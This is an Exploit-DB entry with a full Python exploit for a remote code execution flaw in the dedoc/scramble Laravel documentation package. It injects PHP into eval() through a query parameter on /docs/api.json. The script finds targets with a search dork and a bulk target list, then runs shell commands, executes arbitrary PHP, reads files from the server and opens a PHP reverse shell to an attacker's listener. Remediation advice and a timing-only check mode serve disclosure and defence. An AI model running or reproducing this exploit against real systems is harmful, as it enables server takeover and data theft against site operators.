scramble - Remote Code Execution

EDB-ID:

52582


Author:

joshua

Type:

webapps


Platform:

PHP

Date:

2026-05-27


# Exploit Title: scramble - Remote Code Execution 
# Google Dork: inurl:/docs/api.json "dedoc/scramble"
# Date: 2026-05-07
# Exploit Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Vendor Homepage: https://scramble.dedoc.co
# Software Link: https://github.com/dedoc/scramble
# Version: >=0.13.2, <0.13.22
# Tested on: Linux 6.10.14-linuxkit (aarch64), macOS, Windows
# CVE: CVE-2026-44262
# Reference: https://github.com/joshuavanderpoll/CVE-2026-44262
# Advisory:  https://github.com/advisories/GHSA-4rm2-28vj-fj39
#
# Technique: extract() + eval() in NodeRulesEvaluator::doEvaluateExpression()
#            lets attacker overwrite Scramble's internal $code variable with
#            arbitrary PHP via a query parameter on /docs/api.json.

import argparse
import json
import re
import readline
import ssl
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

DOCS_PATH = "/docs/api.json"
SLEEP_SECONDS = 4

PROOF_FILE_UNIX = "/tmp/scramble_rce_proof.txt"
PROOF_FILE_WIN  = "C:\\Windows\\Temp\\scramble_rce_proof.txt"

R = "\033[91m"
G = "\033[92m"
Y = "\033[93m"
C = "\033[96m"
P = "\033[95m"
B = "\033[1m"
X = "\033[0m"

REPO = "https://github.com/joshuavanderpoll/CVE-2026-44262"
DEFAULT_UA = f"Mozilla/5.0 AppleWebKit/537.36 (CVE-2026-44262; +{REPO})"
DEFAULT_TIMEOUT = 15.0

_ua = DEFAULT_UA
_timeout = DEFAULT_TIMEOUT
_target_os = "unknown"

CTX = ssl.create_default_context()
CTX.check_hostname = False
CTX.verify_mode = ssl.CERT_NONE


def print_banner():
    print(f"{P}{B}")
    print(r"   _____   _____   ___ __ ___  __     _ _  _ _ ___  __ ___ ")
    print(r"  / __\ \ / / __|_|_  )  \_  )/ / ___| | || | |_  )/ /|_  )")
    print(r" | (__ \ V /| _|___/ / () / // _ \___|_  _|_  _/ // _ \/ / ")
    print(r"  \___| \_/ |___| /___\__/___\___/     |_|  |_/___\___/___|")
    print(f"{X}")
    print(f"{P}{B}{REPO}{X}\n")


def fetch(url: str, timeout: float | None = None):
    req = urllib.request.Request(url, headers={"User-Agent": _ua})
    t = timeout if timeout is not None else _timeout

    try:
        with urllib.request.urlopen(req, context=CTX, timeout=t) as r:
            raw = r.headers
            headers = {k.lower(): v for k, v in raw.items()}
            # get_all handles duplicate Set-Cookie headers
            headers["set-cookie-list"] = raw.get_all("Set-Cookie") or []
            return r.status, r.read().decode(errors="replace"), headers
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace"), {}
    except urllib.error.URLError as e:
        return None, str(e.reason), {}


def info(msg):
    print(f"{Y}[*]{X} {msg}")


def ok(msg):
    print(f"{G}[+]{X} {msg}")


def err(msg):
    print(f"{R}[-]{X} {msg}")


def proc(msg):
    print(f"{C}[@]{X} {msg}")


def normalize_target(target: str) -> str:
    if not target.startswith(("http://", "https://")):
        target = "http://" + target
    return target.rstrip("/")


def print_cookie_findings(cookies: list[str]):
    for raw in cookies:
        name = raw.split("=")[0].strip()
        value_part = raw.split("=", 1)[1].split(";")[0].strip() if "=" in raw else ""

        if name.upper() == "XSRF-TOKEN":
            info(f"CSRF token (XSRF-TOKEN): {G}{value_part}{X}")
        elif "session" in name.lower():
            info(f"Session cookie '{name}': {G}{value_part}{X}")
        else:
            info(f"Cookie '{name}': {value_part}")


def check_accessible(base: str) -> bool:
    url = base + DOCS_PATH

    proc(f"Probing {url}")

    status, body, headers = fetch(url)

    if status is None:
        err(body)
        return False

    if status == 200 and '"paths"' in body:
        ok(f"HTTP {status} — docs accessible")

        if server := headers.get("server"):
            info(f"Server: {G}{server}{X}")

        if powered := headers.get("x-powered-by"):
            info(f"X-Powered-By: {G}{powered}{X}")

        if cookies := headers.get("set-cookie-list"):
            print_cookie_findings(cookies)

        return True

    err(f"HTTP {status} — not accessible or wrong target")
    return False


def analyze_spec(base: str) -> tuple[list[tuple[str, str]], str | None]:
    """
    Single spec fetch — prints all discovered target info.
    Returns (vuln_params, version).
    """
    _, body, _ = fetch(base + DOCS_PATH)

    vuln_hits = []
    version = None

    # Laravel rule keywords that'd never appear as legit query param defaults
    rule_pattern = re.compile(
        r"^(required|nullable|string|integer|numeric|boolean|array|min:|max:|in:)", re.I
    )

    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return vuln_hits, version

    info_block = data.get("info", {})
    version = info_block.get("version")

    if title := info_block.get("title"):
        info(f"API title: {G}{title}{X}")

    if version:
        info(f"API version: {G}{version}{X}")

    if servers := data.get("servers"):
        for s in servers:
            info(f"Server URL: {G}{s.get('url', '?')}{X}")

    paths = data.get("paths", {})

    if paths:
        info(f"Endpoints discovered ({len(paths)}):")
        for path, methods in paths.items():
            method_list = ", ".join(m.upper() for m in methods)
            print(f"    {Y}{method_list}{X} {path}")

    for path, methods in paths.items():
        for method_data in methods.values():
            for param in method_data.get("parameters", []):
                if param.get("in") != "query":
                    continue

                schema = param.get("schema", {})
                default = str(schema.get("default", ""))

                if rule_pattern.match(default) or "|" in default:
                    vuln_hits.append((path, param["name"]))

    return vuln_hits, version


def build_attack_url(base: str, param: str, payload: str) -> str:
    return base + DOCS_PATH + "?" + urllib.parse.urlencode({param: payload})


def capture_output(base: str, param: str, payload: str) -> str | None:
    """
    Send a PHP payload and capture output from the response body.
    Output from print/echo appears before the JSON — everything before '{'.
    """
    _, body, _ = fetch(build_attack_url(base, param, payload))

    json_start = body.find("{")

    if json_start == -1:
        return body.strip() or None

    output = body[:json_start].strip()
    return output or None


def probe_timing(base: str, param: str) -> bool:
    proc(f"Timing probe — sleep({SLEEP_SECONDS}) via param '{param}'")

    t0 = time.monotonic()
    fetch(base + DOCS_PATH)
    baseline = time.monotonic() - t0
    info(f"Baseline: {baseline:.2f}s")

    attack_url = build_attack_url(base, param, f"sleep({SLEEP_SECONDS})")
    info(f"Payload URL: {attack_url}")

    t0 = time.monotonic()
    fetch(attack_url, timeout=SLEEP_SECONDS + _timeout)
    elapsed = time.monotonic() - t0
    delay = elapsed - baseline

    info(f"Attack response: {elapsed:.2f}s (delay: {delay:+.2f}s)")

    triggered = delay >= (SLEEP_SECONDS * 0.75)

    if triggered:
        ok(f"VULNERABLE — response delayed ~{SLEEP_SECONDS}s")
    else:
        err("Not triggered (no significant delay)")

    return triggered


def probe_exec(base: str, param: str) -> bool:
    proc(f"Command exec probe via param '{param}'")

    cmd = "whoami" if is_windows() else "id 2>&1"
    output = capture_output(base, param, f"print(shell_exec({json.dumps(cmd)}))")

    if output:
        ok("VULNERABLE — command output captured:")
        print(f"\n  {B}{output}{X}\n")
        return True

    err("No command output in response (not vulnerable via this vector)")
    return False


def detect_os(base: str, param: str):
    global _target_os

    raw = capture_output(base, param, "print(php_uname('s'))")

    if not raw:
        return

    lower = raw.strip().lower()

    if "windows" in lower:
        _target_os = "windows"
    elif "linux" in lower:
        _target_os = "linux"
    elif "darwin" in lower:
        _target_os = "darwin"
    else:
        _target_os = raw.strip()

    info(f"Target OS: {G}{_target_os}{X}")


def is_windows() -> bool:
    return _target_os == "windows"


def proof_file() -> str:
    return PROOF_FILE_WIN if is_windows() else PROOF_FILE_UNIX


def shell_binary() -> str:
    return "cmd.exe" if is_windows() else "/bin/sh"


def print_output_block(output: str):
    print(f"\n{B}{'─' * 65}{X}")
    print(output)
    print(f"{B}{'─' * 65}{X}\n")


def run_command(base: str, param: str, cmd: str):
    proc(f"Executing: {cmd}")

    # 2>&1 merges stderr into stdout so errors show up in output
    cmd_with_stderr = cmd if "2>" in cmd else cmd + " 2>&1"
    output = capture_output(base, param, f"print(shell_exec({json.dumps(cmd_with_stderr)}))")

    if output is not None:
        print_output_block(output)
    else:
        err("No output (command may have failed silently)")


def run_code(base: str, param: str, code: str):
    proc("Executing raw PHP code")

    # closure makes multi-statement code a single eval-able expression
    wrapped = f"(function(){{ {code} }})()"
    output = capture_output(base, param, wrapped)

    if output is not None:
        print_output_block(output)
    else:
        err("No output returned")


def run_read_file(base: str, param: str, path: str):
    proc(f"Reading file: {path}")

    output = capture_output(base, param, f"print(file_get_contents({json.dumps(path)}))")

    if output is not None:
        ok(f"Contents of {path}:")
        print_output_block(output)
    else:
        err("No output — file may not exist or not readable")


def run_reverse_shell(base: str, param: str, lhost: str, lport: int):
    """
    PHP eval-loop reverse shell — no bash or busybox required.
    Connects back to lhost:lport and executes PHP code sent over the socket.
    """
    info(f"Starting listener on your end:")
    print(f"\n    {B}nc -lvnp {lport}{X}\n")

    proc(f"Sending reverse shell payload to {lhost}:{lport}")

    shell = shell_binary()

    # proc_open pipes shell stdin/stdout/stderr directly to the socket
    payload = (
        f"(function(){{"
        f"$s=@fsockopen('{lhost}',{lport},$e,$m,30);"
        f"if(!$s)return;"
        f"$p=proc_open({json.dumps(shell)},array(0=>$s,1=>$s,2=>$s),$pipes);"
        f"if($p)proc_close($p);"
        f"fclose($s);"
        f"}})()"
    )

    # fire and forget — connection hangs until shell is done
    fetch(build_attack_url(base, param, payload), timeout=3600)


def run_check(base: str, skip_os_detect: bool = False):
    """Non-breaking check — timing probe only, no command execution."""
    if not check_accessible(base):
        err("Docs not accessible.")
        return False

    print()
    proc("Analyzing OpenAPI spec...")
    print()

    vuln_params, _ = analyze_spec(base)
    print()

    if not vuln_params:
        err("No vulnerable parameters detected in spec")
        return False

    ok(f"Found {len(vuln_params)} potentially vulnerable parameter(s):")
    for path, pname in vuln_params:
        print(f"    {Y}{path}{X} → param '{B}{pname}{X}'")

    print()

    _, param = vuln_params[0]

    if not skip_os_detect:
        detect_os(base, param)
    print()

    return probe_timing(base, param)


def print_header(base: str):
    print(f"\n{B}{'=' * 65}{X}")
    print(f"{B}  GHSA-4rm2-28vj-fj39 — dedoc/scramble RCE checker{X}")
    print(f"  Target: {C}{base}{X}")
    print(f"{B}{'=' * 65}{X}\n")


def print_summary(base: str, param: str, timing: bool, exec_: bool):
    print(f"{B}{'=' * 65}{X}")
    print(f"{B}  SUMMARY{X}")
    print(f"{B}{'=' * 65}{X}")
    print(f"  Target:       {C}{base}{X}")
    print(f"  Vuln param:   {param}")
    print(f"  Timing probe: {'%sTRIGGERED%s' % (G, X) if timing else 'clean'}")
    print(f"  Exec probe:   {'%sTRIGGERED%s' % (G, X) if exec_ else 'clean'}")

    vulnerable = timing or exec_

    if vulnerable:
        print(f"\n  {R}{B}Verdict: *** VULNERABLE *** (RCE confirmed){X}")
        print(f"\n  {Y}Remediation:{X}")
        print(f"    {B}1. Patch (recommended){X}")
        print("       composer require dedoc/scramble:^0.13.22")
        print(f"    {B}2. Restrict docs access{X}")
        print("       Add RestrictedDocsAccess middleware in config/scramble.php:")
        print("       'middleware' => ['web', RestrictedDocsAccess::class]")
        print(f"    {B}3. Disable docs in production{X}")
        print("       Remove Scramble::routes() from AppServiceProvider or")
        print("       wrap registration in: if (app()->isLocal()) { ... }")
        print(f"    {B}4. Block at web server level{X}")
        print("       Deny access to /docs and /docs/api.json for external IPs")
        print()
        print(f"  {Y}⭐ If this tool helped you, consider starring the repo: {B}{Y}{REPO}{X}")
    else:
        print(f"\n  {G}Verdict: Not exploitable via this vector{X}")

    print(f"{B}{'=' * 65}{X}\n")

    return vulnerable


def main():
    global _ua, _timeout, _target_os

    parser = argparse.ArgumentParser(description="GHSA-4rm2-28vj-fj39 — dedoc/scramble RCE")

    target_group = parser.add_mutually_exclusive_group(required=True)
    target_group.add_argument("--target", help="Target URL")
    target_group.add_argument("--targets", metavar="FILE", help="File with one target URL per line")

    parser.add_argument("--check", action="store_true", help="Safe non-breaking check only (timing probe, no command execution)")
    parser.add_argument("--command", metavar="CMD", help="Execute a shell command and print output")
    parser.add_argument("--code", metavar="PHP", help="Execute raw PHP code and print output")
    parser.add_argument("--read-file", metavar="PATH", help="Read a file from the target filesystem")
    parser.add_argument("--shell", action="store_true", help="Start a PHP eval reverse shell (requires --lhost and --lport)")
    parser.add_argument("--lhost", metavar="HOST", help="Listener host for reverse shell")
    parser.add_argument("--lport", metavar="PORT", type=int, help="Listener port for reverse shell")
    parser.add_argument("--os", choices=["windows", "linux", "darwin"], metavar="OS",
                        help="Force target OS (windows/linux/darwin) — skips auto-detection. "
                             "Affects shell binary (cmd.exe vs /bin/sh), proof file path, and exec probe command.")
    parser.add_argument("--useragent", default=DEFAULT_UA, help="Custom User-Agent string")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, metavar="SECONDS", help="Request timeout in seconds (default: 15)")
    args = parser.parse_args()

    _ua = args.useragent
    _timeout = args.timeout

    if args.os:
        _target_os = args.os
        info(f"OS forced: {G}{_target_os}{X}")

    if args.shell and (not args.lhost or not args.lport):
        print(f"{R}[-]{X} --shell requires --lhost and --lport")
        sys.exit(1)

    print_banner()

    # bulk check mode
    if args.targets:
        try:
            with open(args.targets) as f:
                targets = [normalize_target(l.strip()) for l in f if l.strip()]
        except FileNotFoundError:
            err(f"Targets file not found: {args.targets}")
            sys.exit(1)

        results = []

        for target in targets:
            print_header(target)
            vulnerable = run_check(target, skip_os_detect=bool(args.os))
            results.append((target, vulnerable))
            print()

        print(f"{B}{'=' * 65}{X}")
        print(f"{B}  BULK SCAN RESULTS{X}")
        print(f"{B}{'=' * 65}{X}")

        for target, vuln in results:
            status = f"{R}{B}VULNERABLE{X}" if vuln else f"{G}clean{X}"
            print(f"  {status}  {target}")

        print(f"{B}{'=' * 65}{X}\n")
        sys.exit(0)

    base = normalize_target(args.target)

    print_header(base)

    # safe check mode — no exploit
    if args.check:
        vulnerable = run_check(base, skip_os_detect=bool(args.os))
        sys.exit(1 if vulnerable else 0)

    # full detection + exploit path
    if not check_accessible(base):
        err("Docs not accessible — cannot continue.")
        sys.exit(0)

    print()
    proc("Analyzing OpenAPI spec...")
    print()

    vuln_params, _ = analyze_spec(base)
    print()

    if not vuln_params:
        err("No vulnerable parameters detected in spec")
        sys.exit(0)

    ok(f"Found {len(vuln_params)} potentially vulnerable parameter(s):")
    for path, pname in vuln_params:
        print(f"    {Y}{path}{X} → param '{B}{pname}{X}'")

    print()

    _, param = vuln_params[0]

    if not args.os:
        detect_os(base, param)
    print()

    if args.command:
        run_command(base, param, args.command)
        sys.exit(0)

    if args.code:
        run_code(base, param, args.code)
        sys.exit(0)

    if args.read_file:
        run_read_file(base, param, args.read_file)
        sys.exit(0)

    if args.shell:
        run_reverse_shell(base, param, args.lhost, args.lport)
        sys.exit(0)

    # default — full detection probes
    timing_result = probe_timing(base, param)
    print()
    exec_result = probe_exec(base, param)
    print()

    vulnerable = print_summary(base, param, timing_result, exec_result)
    sys.exit(1 if vulnerable else 0)


if __name__ == "__main__":
    main()